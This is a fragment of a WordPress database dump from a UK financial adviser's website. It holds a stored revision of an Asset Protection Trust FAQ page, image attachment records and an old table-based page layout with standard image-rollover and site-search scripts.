</b>- You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on that particular asset.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Is there any limit on the value of assets placed with the Trust? </b>- The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>When is the best time to set up the Trust?</b> – We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent you had expectation in entering long term care.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I change my mind?</b> – You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I move house? </b>- Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What happens if one of us dies? </b>- Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What happens if one of the other Trustees die?</b> – A new Trustee is simply assumed in their place.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Who gets my estate when I die?</b> – You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">To find out more about Asset Protection Trusts and to get the advice you need, then please contact us on our free phone number <span class=\"rTapNumber13629\"/> to get started with your FREE complimentary review.</span></p>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/trusts\" title=\"Back to Parent Page\">Trusts</a></li>&#13;\n						<li class=\"page_item page-item-109\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n<li class=\"page_item page-item-106 current_page_item\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n<li class=\"page_item page-item-111\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n<li class=\"page_item page-item-141\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n<li class=\"page_item page-item-144\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">Stock Market Bulletin – February 2017</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-powerful-reasons-review-critical-illness-insurance\">5 Powerful Reasons To Review Your Critical illness Insurance</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n								<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n								<a href=\"/\" title=\"A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/a-guide-to-protection-planning\" title=\"A Guide To Protection Planning\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"/feed\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinte_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Asset Protection Trust','Why asset protection trusts matter. 1 in 4 women & 1 in 6 men over 65 will go into care. And the Council can take all your assets to pay for it.','inherit','closed','closed','','48-revision-v1','','','2017-09-21 16:47:17','2017-09-21 16:47:17','',48,'http://www.equalitywalk.org.uk/48-revision-v1',0,'revision','',0),(247,1,'2017-09-21 16:47:24','2017-09-21 16:47:24','','hands-typing-2','','inherit','open','closed','','hands-typing-2','','','2017-09-21 16:47:24','2017-09-21 16:47:24','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-2.jpg',0,'attachment','image/jpeg',0),(248,1,'2017-09-21 16:47:33','2017-09-21 16:47:33','','hands-typing-3','','inherit','open','closed','','hands-typing-3','','','2017-09-21 16:47:33','2017-09-21 16:47:33','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-3.jpg',0,'attachment','image/jpeg',0),(249,1,'2017-09-21 16:47:40','2017-09-21 16:47:40','','hands-typing-4','','inherit','open','closed','','hands-typing-4','','','2017-09-21 16:47:40','2017-09-21 16:47:40','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-4.jpg',0,'attachment','image/jpeg',0),(251,1,'2017-09-21 16:47:50','2017-09-21 16:47:50','','hands-typing-5','','inherit','open','closed','','hands-typing-5','','','2017-09-21 16:47:50','2017-09-21 16:47:50','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-5.jpg',0,'attachment','image/jpeg',0),(252,1,'2017-09-21 16:47:59','2017-09-21 16:47:59','','hands-typing-6','','inherit','open','closed','','hands-typing-6','','','2017-09-21 16:47:59','2017-09-21 16:47:59','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-6.jpg',0,'attachment','image/jpeg',0),(253,1,'2017-09-21 16:48:06','2017-09-21 16:48:06','','hands-typing-7','','inherit','open','closed','','hands-typing-7','','','2017-09-21 16:48:06','2017-09-21 16:48:06','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing-7.jpg',0,'attachment','image/jpeg',0),(255,1,'2017-09-21 16:48:15','2017-09-21 16:48:15','','mobile-payment','','inherit','open','closed','','mobile-payment','','','2017-09-21 16:48:15','2017-09-21 16:48:15','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/mobile-payment.jpg',0,'attachment','image/jpeg',0),(256,1,'2017-09-21 16:48:24','2017-09-21 16:48:24','','mobile-payment-2','','inherit','open','closed','','mobile-payment-2','','','2017-09-21 16:48:24','2017-09-21 16:48:24','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/mobile-payment-2.jpg',0,'attachment','image/jpeg',0),(257,1,'2017-09-21 16:48:34','2017-09-21 16:48:34','','mobile-payment-3','','inherit','open','closed','','mobile-payment-3','','','2017-09-21 16:48:34','2017-09-21 16:48:34','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/mobile-payment-3.jpg',0,'attachment','image/jpeg',0),(258,1,'2017-09-21 16:48:42','2017-09-21 16:48:42','','mobile-payment-4','','inherit','open','closed','','mobile-payment-4','','','2017-09-21 16:48:42','2017-09-21 16:48:42','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/mobile-payment-4.jpg',0,'attachment','image/jpeg',0),(259,1,'2017-09-21 16:48:48','2017-09-21 16:48:48','','IMG_0740','','inherit','open','closed','','img_0740','','','2017-09-21 16:48:48','2017-09-21 16:48:48','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0740.jpg',0,'attachment','image/jpeg',0),(260,1,'2017-09-21 16:48:53','2017-09-21 16:48:53','','IMG_0749','','inherit','open','closed','','img_0749','','','2017-09-21 16:48:53','2017-09-21 16:48:53','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0749.jpg',0,'attachment','image/jpeg',0),(261,1,'2017-09-21 16:48:56','2017-09-21 16:48:56','','IMG_0774','','inherit','open','closed','','img_0774','','','2017-09-21 16:48:56','2017-09-21 16:48:56','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0774.jpg',0,'attachment','image/jpeg',0),(262,1,'2017-09-21 16:49:01','2017-09-21 16:49:01','','IMG_0891','','inherit','open','closed','','img_0891','','','2017-09-21 16:49:01','2017-09-21 16:49:01','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0891.jpg',0,'attachment','image/jpeg',0),(263,1,'2017-09-21 16:49:08','2017-09-21 16:49:08','','IMG_0943','','inherit','open','closed','','img_0943','','','2017-09-21 16:49:08','2017-09-21 16:49:08','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0943.jpg',0,'attachment','image/jpeg',0),(265,1,'2017-09-21 16:49:15','2017-09-21 16:49:15','','IMG_0944','','inherit','open','closed','','img_0944','','','2017-09-21 16:49:15','2017-09-21 16:49:15','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0944.jpg',0,'attachment','image/jpeg',0),(266,1,'2017-09-21 16:49:23','2017-09-21 16:49:23','','IMG_0958','','inherit','open','closed','','img_0958','','','2017-09-21 16:49:23','2017-09-21 16:49:23','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0958.jpg',0,'attachment','image/jpeg',0),(267,1,'2017-09-21 16:49:27','2017-09-21 16:49:27','','IMG_0959','','inherit','open','closed','','img_0959','','','2017-09-21 16:49:27','2017-09-21 16:49:27','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0959.jpg',0,'attachment','image/jpeg',0),(268,1,'2017-09-21 16:49:32','2017-09-21 16:49:32','','IMG_0961','','inherit','open','closed','','img_0961','','','2017-09-21 16:49:32','2017-09-21 16:49:32','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0961.jpg',0,'attachment','image/jpeg',0),(269,1,'2017-09-21 16:49:36','2017-09-21 16:49:36','','IMG_0962','','inherit','open','closed','','img_0962','','','2017-09-21 16:49:36','2017-09-21 16:49:36','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0962.jpg',0,'attachment','image/jpeg',0),(270,1,'2017-09-21 16:49:41','2017-09-21 16:49:41','','IMG_0965','','inherit','open','closed','','img_0965','','','2017-09-21 16:49:41','2017-09-21 16:49:41','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0965.jpg',0,'attachment','image/jpeg',0),(271,1,'2017-09-21 16:49:47','2017-09-21 16:49:47','','IMG_0968','','inherit','open','closed','','img_0968','','','2017-09-21 16:49:47','2017-09-21 16:49:47','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0968.jpg',0,'attachment','image/jpeg',0),(272,1,'2017-09-21 16:49:52','2017-09-21 16:49:52','','IMG_0972','','inherit','open','closed','','img_0972','','','2017-09-21 16:49:52','2017-09-21 16:49:52','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0972.jpg',0,'attachment','image/jpeg',0),(273,1,'2017-09-21 16:49:58','2017-09-21 16:49:58','','IMG_0974','','inherit','open','closed','','img_0974','','','2017-09-21 16:49:58','2017-09-21 16:49:58','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0974.jpg',0,'attachment','image/jpeg',0),(275,1,'2017-09-21 16:50:02','2017-09-21 16:50:02','','IMG_0981','','inherit','open','closed','','img_0981','','','2017-09-21 16:50:02','2017-09-21 16:50:02','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0981.jpg',0,'attachment','image/jpeg',0),(276,1,'2017-09-21 16:50:07','2017-09-21 16:50:07','','IMG_0982','','inherit','open','closed','','img_0982','','','2017-09-21 16:50:07','2017-09-21 16:50:07','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0982.jpg',0,'attachment','image/jpeg',0),(277,1,'2017-09-21 16:50:11','2017-09-21 16:50:11','','IMG_0983','','inherit','open','closed','','img_0983','','','2017-09-21 16:50:11','2017-09-21 16:50:11','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0983.jpg',0,'attachment','image/jpeg',0),(278,1,'2017-09-21 16:50:16','2017-09-21 16:50:16','','IMG_0984','','inherit','open','closed','','img_0984','','','2017-09-21 16:50:16','2017-09-21 16:50:16','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_0984.jpg',0,'attachment','image/jpeg',0),(279,1,'2017-09-21 16:50:21','2017-09-21 16:50:21','','IMG_1000','','inherit','open','closed','','img_1000','','','2017-09-21 16:50:21','2017-09-21 16:50:21','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1000.jpg',0,'attachment','image/jpeg',0),(281,1,'2017-09-21 16:50:27','2017-09-21 16:50:27','','IMG_1001','','inherit','open','closed','','img_1001','','','2017-09-21 16:50:27','2017-09-21 16:50:27','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1001.jpg',0,'attachment','image/jpeg',0),(282,1,'2017-09-21 16:50:36','2017-09-21 16:50:36','','IMG_1012','','inherit','open','closed','','img_1012','','','2017-09-21 16:50:36','2017-09-21 16:50:36','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1012.jpg',0,'attachment','image/jpeg',0),(283,1,'2017-09-21 16:50:43','2017-09-21 16:50:43','','IMG_1013','','inherit','open','closed','','img_1013','','','2017-09-21 16:50:43','2017-09-21 16:50:43','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1013.jpg',0,'attachment','image/jpeg',0),(284,1,'2017-09-21 16:50:47','2017-09-21 16:50:47','','IMG_1024','','inherit','open','closed','','img_1024','','','2017-09-21 16:50:47','2017-09-21 16:50:47','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1024.jpg',0,'attachment','image/jpeg',0),(285,1,'2017-09-21 16:50:51','2017-09-21 16:50:51','','IMG_1056','','inherit','open','closed','','img_1056','','','2017-09-21 16:50:51','2017-09-21 16:50:51','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1056.jpg',0,'attachment','image/jpeg',0),(286,1,'2017-09-21 16:51:00','2017-09-21 16:51:00','','IMG_1108','','inherit','open','closed','','img_1108','','','2017-09-21 16:51:00','2017-09-21 16:51:00','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1108.jpg',0,'attachment','image/jpeg',0),(287,1,'2017-09-21 16:51:09','2017-09-21 16:51:09','','IMG_1109','','inherit','open','closed','','img_1109','','','2017-09-21 16:51:09','2017-09-21 16:51:09','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1109.jpg',0,'attachment','image/jpeg',0),(289,1,'2017-09-21 16:51:18','2017-09-21 16:51:18','','IMG_1113','','inherit','open','closed','','img_1113','','','2017-09-21 17:11:31','2017-09-21 17:11:31','',49,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1113.jpg',0,'attachment','image/jpeg',0),(290,1,'2017-09-21 16:51:24','2017-09-21 16:51:24','','IMG_1230','','inherit','open','closed','','img_1230','','','2017-09-21 16:51:24','2017-09-21 16:51:24','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1230.jpg',0,'attachment','image/jpeg',0),(291,1,'2017-09-21 16:51:31','2017-09-21 16:51:31','','IMG_1241','','inherit','open','closed','','img_1241','','','2017-09-21 16:51:31','2017-09-21 16:51:31','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1241.jpg',0,'attachment','image/jpeg',0),(294,1,'2017-09-21 16:55:15','2017-09-21 16:55:15','<script language=\"JavaScript1.2\" type=\"text/javascript\"><![CDATA[\n<!-- function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.indexOf(\"?\"))>0&&parent.frames.length) {\n    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}\n  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];\n  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);\n  if(!x && d.getElementById) x=d.getElementById(n); return x;\n}\nfunction MM_swapImage() { //v3.0\n  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)\n   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}\n}\nfunction MM_swapImgRestore() { //v3.0\n  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;\n}\n\nfunction MM_preloadImages() { //v3.0\n  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();\n    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf(\"#\")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } //-->\n]]></script>\n<div style=\"position: absolute; top: 0px; left: 50%; margin-left: -475px;\">\n<table border=\"0\" width=\"950\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"10\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"18\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"92\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"103\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"21\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"73\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"36\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"44\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"21\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"88\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"109\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"9\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"11\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"29\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"138\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"129\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"19\" height=\"1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" /></td>\n</tr>\n<tr>\n<td class=\"header\" style=\"background-image: url(\'/images/index_r1_c1.jpg\'); background-repeat: no-repeat;\" colspan=\"17\" valign=\"top\"><a href=\"/wealth-management-faqs\">wealth management FAQs</a> - <a href=\"/wealth-management-glossary\">glossary of wealth management terms</a> - <a title=\"Already a customer? Click here...\" href=\"https://rsr.wrapadviser.co.uk/\" target=\"_blank\">login</a></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"38\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"17\">\n<div style=\"float: right; padding-right: 40px;\">\n\n<script type=\"text/javascript\" src=\"/jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[ google.load(\'search\', \'1\'); google.setOnLoadCallback(function() { google.search.CustomSearchControl.attachAutoCompletion( \'011057125409238421392:utfk3c-gm7e\', document.getElementById(\'q\'), \'cse-search-box\'); }); ]]></script>\n\n<form id=\"cse-search-box\" action=\"../../search-results/\">&nbsp;\n<div>\n<input name=\"cx\" type=\"hidden\" value=\"011057125409238421392:utfk3c-gm7e\" /><input name=\"cof\" type=\"hidden\" value=\"FORID:9;NB:1\" /><input name=\"ie\" type=\"hidden\" value=\"UTF-8\" /><input id=\"q\" autocomplete=\"on\" name=\"q\" size=\"21\" type=\"text\" /><input name=\"sa\" type=\"submit\" value=\"Search our Site\" /></div>\n<script type=\"text/javascript\" src=\"/cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script>\n\n</form></div></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"27\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"7\"></td>\n<td style=\"background-image: url(\'additional/images/index_r3_c8.jpg\'); background-repeat: no-repeat;\" colspan=\"10\" valign=\"top\">\n<div id=\"topcomment\">With our new Wealth Platform, Wealth Management Clients can keep all their financial plans, pensions &amp; investments in one place, making it easy to review investments 24/7.</div></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"96\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"3\"></td>\n<td colspan=\"2\"></td>\n<td colspan=\"3\"></td>\n<td colspan=\"2\"><a href=\"/trusts-protection\"><img id=\"index_r4_c9\" src=\"/images/index_r4_c9.jpg\" alt=\"Trusts &amp; Bonds\" width=\"109\" height=\"50\" name=\"index_r4_c9\" border=\"0\" /></a></td>\n<td colspan=\"4\"><a href=\"/wealth-platform\"><img id=\"index_r4_c11\" src=\"/images/index_r4_c11.jpg\" alt=\"Wealth Management\" width=\"158\" height=\"50\" name=\"index_r4_c11\" border=\"0\" /></a></td>\n<td></td>\n<td colspan=\"2\"></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"50\" border=\"0\" /></td>\n</tr>\n<tr>\n<td><img id=\"index_r5_c1\" src=\"/images/index_r5_c1.jpg\" alt=\"\" width=\"10\" height=\"260\" name=\"index_r5_c1\" border=\"0\" /></td>\n<td colspan=\"5\"></td>\n<td colspan=\"6\"><a href=\"/pension\"><img id=\"index_r5_c7\" src=\"/images/index_r5_c7.jpg\" alt=\"Pension Advice\" width=\"307\" height=\"260\" name=\"index_r5_c7\" border=\"0\" /></a></td>\n<td colspan=\"4\"></td>\n<td></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"260\" border=\"0\" /></td>\n</tr>\n<tr>\n<td><img id=\"index_r6_c1\" src=\"/images/index_r6_c1.jpg\" alt=\"\" width=\"10\" height=\"43\" name=\"index_r6_c1\" border=\"0\" /></td>\n<td class=\"subheader\" style=\"background-image: url(\'file:///C|/Users/ben/Desktop/images/index_r6_c2.jpg\'); background-repeat: no-repeat;\" colspan=\"5\"><a href=\"/investments\">Savings &amp; Investments</a></td>\n<td class=\"subheader\" style=\"background-image: url(\'file:///C|/Users/ben/Desktop/images/index_r6_c2.jpg\'); background-repeat: no-repeat;\" colspan=\"6\"><a href=\"/pension\">Pensions</a></td>\n<td class=\"subheader\" style=\"background-image: url(\'/images/index_r6_c13.jpg\'); background-repeat: no-repeat;\" colspan=\"4\">  <a href=\"/trusts-protection\">Trusts &amp; 